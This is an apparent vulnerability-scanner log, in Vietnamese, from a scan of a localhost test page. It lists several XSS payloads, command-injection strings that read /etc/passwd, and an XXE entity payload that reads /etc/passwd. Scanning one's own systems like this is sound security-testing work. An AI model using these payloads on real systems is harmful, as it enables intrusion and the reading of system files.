[TIME] 2025-08-11 04:20:23
[URL] http://localhost/xss/
[SUMMARY] XSS, CMDi, XXE
======= SQLi =======
[*] Đang kiểm tra SQL Injection trên: http://localhost/xss/
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[✓] Không phát hiện lỗ hổng SQLi.


======= XSS =======
[*] Đang kiểm tra XSS trên: http://localhost/xss/
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[!] Có thể bị tấn công XSS với các payloads:
    - <details open ontoggle=alert(7)>
    - <script>alert(1)</script>
    - <math href="javascript:alert(6)">
    - <iframe src="javascript:alert(5)">
    - <video src=1 onerror=alert(9)>
    - '><svg/onload=alert(3)>
    - <marquee onstart=alert(8)>
    - "><img src=x onerror=alert(2)>
    - "><svg onmouseover=alert(4)>


======= LFI =======
[*] Đang kiểm tra LFI trên: http://localhost/xss/
[✓] Không phát hiện lỗ hổng LFI.


======= CMDi =======
[*] Đang kiểm tra Command Injection trên: http://localhost/xss/
[!] Có thể bị tấn công CMDi với các payloads:
    - && cat /etc/passwd
    - ; cat /etc/passwd
    - | cat /etc/passwd


======= XXE =======
[*] Đang kiểm tra XXE trên: http://localhost/xss/
[!] Có thể bị tấn công XXE với các payloads:
    - <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    - <?xml version="1.0" ?>
    - <foo>&xxe;</foo>


